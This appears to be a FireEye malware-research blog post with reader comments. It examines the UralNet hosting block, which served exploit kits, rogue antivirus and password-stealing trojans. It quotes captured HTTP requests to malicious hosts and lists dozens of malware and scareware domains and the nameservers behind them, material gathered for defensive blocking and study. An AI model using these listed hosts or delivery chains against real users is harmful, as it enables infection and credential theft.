User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; es-es) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15
Referer: http://www.creativosenvivo.com/rioceballos/ubicacion_geografica.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: 91.211.64.180
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; es-es) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15
Referer: http://www.creativosenvivo.com/rioceballos/ubicacion_geografica.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: 91.211.64.180
This exploit created C:\7yksfi.exe which was Trojan.Meredrop. It went on to create bph2d6.exe and
emqsys.dll which are both part of Trojan.Tibs. It also installed a password stealer (setupapi.dll) into
both Internet Explorer and Firefox
91.255.64.147 - There was a fun web exploit on this page that walked you through numerous steps and
faked the User-Agent each time before it delivered the final malware, again, to ensure you weren't a
crawler.
GET /order/cd.php?userid=xxx_xxx_xxx HTTP/1.1
User-Agent: AS
Host: beautytraffic.com
Cache-Control: no-cache
User-Agent: AS
Host: beautytraffic.com
Cache-Control: no-cache
POST /order/dan.php HTTP/1.1
Referer: SAS
Content-Type: application/x-www-form-urlencoded
User-Agent: AE
Host: beautytraffic.com
POST /order/sdt.php HTTP/1.1
Referer: SAS
Content-Type: multipart/form-data; boundary=xxxx
User-Agent: A
Host: beautytraffic.com
91.211.65.130 - More rogue AVs hosted here:
GET /hitin.php?land=20&affid=00201 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight, application/msword, application/x-silverlight-2-b2, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: greatstabilityscanonline.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight, application/msword, application/x-silverlight-2-b2, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: greatstabilityscanonline.com
91.211.64.191 - Various exploits hosted on:
91.211.64.191-artovskaja.com
91.211.64.191-domofonosik.com
91.211.64.191-karatmazovs.com
91.211.64.191-molotkaovbiz.com
As I explored in an earlier post, directly serving content is merely one avenue to make money in the
hosting space. Managing DNS services for malicious domains is another way that UralNet is being used
for facilitate the delivery of malware.
Pointing to 91.211.64.47 is ns1.singatours.com, ns1.skycomputingonline.com, and
ns1.airflysupport.com.
These nameservers are listed as an NS record for the following malicious domains:
advancedantivirusproscan.com
advancedproantivirusscan.com
advertisenetworktour.cn
bestantimalwaredefence.com
bestantimalwaredefense.com
bestantimalwaresoftware.com
bulletproofmonk.cn
centralwebsecurity.cn
controlledsurfaces.cn
getveryluckytoday.cn
liteantimalwarescan.com
liteantimalwarescanner.com
lite-anti-spyware-pro-scanner.com
lite-antispyware-pro-scanner.com
liteantispywareproscanner.com
liteantivirusproscan.com
liteantivirusproscanner.com
lite-anti-virus-scan.com
lite-antivirus-scan.com
liteantivirusscan.com
lite-anti-virus-scanner.com
lite-antivirus-scanner.com
liteantivirusscanner.com
liveantimalwarescan.com
liveantimalwarescanner.com
luckypowertools.cn
onlineantimalwareproscan.com
onlineantimalwarescan.com
ourlifeisverygood.cn
premiumantiviruspccheck.com
premiumantiviruspcscan.com
premiumlivespywarescan.com
proantimalwareonlinescan.com
proantimalwarescan.com
pro-antimalware-scanner.com
professionalantivirusscanner.com
promolegotools.cn
prosystemonlinescan.com
prosystemonlinescanner.com
pro-system-scan.com
prosystemscan.com
prosystemscanner.com
thebestworldparty.cn
verifyclickssystem.cn
worldcommercialbusiness.cn
On 91.211.64.71 is ns1.admediastats.com, ns1.of-ficialstat.com, ns1.stats-manager-online.com,
ns1.themonitoring.net, ns1.clickanalytic.com, ns1.st-athome.net, and ns1.traffic-ad-manager.com
These are NS records for the following malicious domains:
admediastats.com
of-ficialstat.com
stats-manager-online.com
themonitoring.net
clickanalytic.com
st-athome.net
traffic-ad-manager.com
On 91.211.64.118 is ns1.dnsmytruedns.com which provides services for:
ffseik.com
porgacig.cn
teirkmm.net
On 91.211.64.130 is ns2.extrafilesstorage.com which is the secondary (but only responding) NS
record for extrafilesstorage.com, which might seem legitimate, but Google agrees with my assesment.
On 91.211.64.173 and 91.211.64.174 is ns1. and ns2.stabilityscan.com, which are the NS for
stabilityscan.com
On 91.211.65.110 and 91.211.65.111 is ns1 and ns2.stabilityscanonline.com, which are the NS for
stabilityscanonline.com
91.211.64.191 is ns1 AND ns2.molotkaovbiz.com which provide services for the following malicious
domains:
molotkaovbiz.com
karatmazovs.com
artovskaja.com
domofonosik.com
91.211.65.130 is ns1.internetskim.com and ns1.stabilityinternetearthguide.com
91.211.65.131 is ns2.internetskim.com and ns2.stabilityinternetearthguide.com
These host internetskim.com and greatstabilityscanonline.com, both malicious.
91.211.65.23 is ns (not ns1) and ns2.australianpornomovies.com which are the NS for
australianpornomovies.com, which might seem appealing but it's really a malware distribution point.
91.211.65.29 is ns1 and ns2.easywebsiteauditor.ru for easywebsiteauditor.ru
(pushes/pushed out Pushdo/Cutwail)
91.211.65.50-ns1.avscan7.com, 91.211.66.10-ns2.avscan7.com - avscan7.com
91.211.65.50-ns1.scan5new.com, 91.211.66.10-ns2.scan5new.com - scan5new.com
91.211.65.76-ns1.nscyb.org - russianwolf.ru
91.211.65.99-ns1.uansbiz.biz, 91.211.65.100-ns2.uansbiz.biz
antivirus-xp-pro2009.com
freewebscaners.com
lastcountb.com
onlinenotify.net
Also, a thanks to reader "Andy" who pointed out that estdomains.com, a former malicious
registrar, has their main site, estdomains.com, hosted at UralNet on 91.211.65.72. Upon
examining that address, I see thousands of queries heading to thta IP for various NS servers.
91.211.65.72-imbo144179.managedns1.estboxes.com
91.211.65.72-imbo144179.managedns2.estboxes.com
91.211.65.72-imbo144179.managedns3.estboxes.com
91.211.65.72-imbo144179.managedns4.estboxes.com
91.211.65.72-managedns4.estboxes.com
91.211.65.72-ns1.managedns1.estboxes.com
91.211.65.72-ns2.managedns1.estboxes.com
91.211.65.72-ns3.managedns1.estboxes.com
91.211.65.72-ns4.managedns1.estboxes.com
91.211.65.72-stvl113289.managedns1.estboxes.com
91.211.65.72-stvl113289.managedns2.estboxes.com
91.211.65.72-stvl113289.managedns3.estboxes.com
91.211.65.72-stvl113289.managedns4.estboxes.com
91.211.65.72-b.estdomains.com
91.211.65.72-c.estdomains.com
All the queries were NS, with the exception of b and c.estdomains.com which as an A. The b and
c.estdomains.com query successfully resolves, while all the others come back as "refused".
hpHosts shows quite a bit of malware at UralNet, as does MalwareDomainList
I didn't cherry pick through research traffic to find "the worst of the worst" - I was literally able to use
every piece of information I came across in this article. I didn't find a single service on UralNet that
wasn't tied to criminal activity. Some might make the argument that I wasn't looking at any traffic that
originated from Ukraine or Russia, and hence, I might not have seen the legitimate sites hosted there.
This is possible, for live traffic, but I was also able to examine a significant amount of DNS traffic
heading to those blocks, and I couldn't find any trace of legitimacy after crawling those sites. I can't be
sure that UralNet is 100% malicious, rather, I can only say that 100% of what I saw going there was
malicious. The high dispersion of malware throughout their whole /22 makes them extremely suspect.
Alex Lanstein @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com
Anybody notice estdomains.com is hosted on IP address: 91.211.65.72 ?
Not this is bad but just seems a bit odd.
Anyways, love the blog and these posts,
Thanks
Note that currently the uralnet.biz primary and secondary NS hosts seem to not understand that they are authoritative for uralnet.biz, which is ‘convenient’. Another obfusaction technique used by this crew.
clipped portion of dig +trace NS uralnet.biz:
biz. 172800 IN NS C.GTLD.biz.
biz. 172800 IN NS D.GTLD.biz.
biz. 172800 IN NS E.GTLD.biz.
;; Received 346 bytes from 192.228.79.201#53(B.ROOT-SERVERS.NET) in 83 ms
uralnet.biz. 7200 IN NS DNS1.NDW.RU.
uralnet.biz. 7200 IN NS DNS2.NDW.RU.
;; Received 73 bytes from 2001:503:7bbb:ffff:ffff:ffff:ffff:ff7e#53(G.GTLD.biz) in 150 ms
. 518400 IN NS E.ROOT-SERVERS.NET.
. 518400 IN NS F.ROOT-SERVERS.NET.
.biz servers send us to the proper hosts who send us back to the root…
“Interestingly, I can’t pull an MX record for uralnet.biz. It doesn’t appear they take abuse notifications too seriously.”
An MX record is not required for receiving mail. If a host hasn’t got one, then the standard behaviour is to use the A record instead.
RFC 2821 Section 5:
“If no MX records are found, but an A RR is found, the A RR is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host.”
http://www.ietf.org/rfc/rfc2821.txt
O.
Thanks for the comments, guys.
@Andy - You know, I had seen this and I totally forgot to include it. I updated the article above
@Olliver - I should have been more specific, my original article included a dig but it was getting too long so I chopped it out. There is no A record either - I updated the article to reflect this.
As always, I appreciate the input
-alex
“Anybody notice estdomains.com is hosted on IP address: 91.211.65.72 ?”
Andy, I just checked and I’m seeing the same:
$ host estdomains.com
estdomains.com has address 91.211.65.72
estdomains.com mail is handled by 10 mail2.estdomains.com.
estdomains.com mail is handled by 5 mail.estdomains.com.
O.
Just wanted to say thanks very much! Very useful information.
Cheers, mitch
Good information guys, just one question…..How do I get this OFF my computer…>?!Going back to 91.211.65.99 (onlinenotify.net) I wanted to highlight some fun language, italicized for effect:
GET /winlogon.htm HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
Host: onlinenotify.net
Many viruses were found on your computer such as : Trojan horse, PassCapture, etc. Your personal information can fall into in the “third hands”. Please check up the computer with a special software.I agree, those “third hands” can be a real bugger.
Also on this IP:
91.211.65.99-freewebscaners.com
Staggs
After a few sites of mine fell victim to some attacks sql / xss i went through logs of a domain which received little traffic and saw this IP 91.211.64.87 i googled it and found your site. I’m wondering if you have a complete list of IP’s i can add to my htaccess and deny them from coming to my site. I think i can deny *.ru but not 100% sure if i can deny entire TLD’s. I’m still looking for a site that collects these malicious IP’s i’d like to deny their entire IP blocks.
http://proimblogger.com/seo-link-robot-review/
Malware Intelligence Lab from FireEye - Research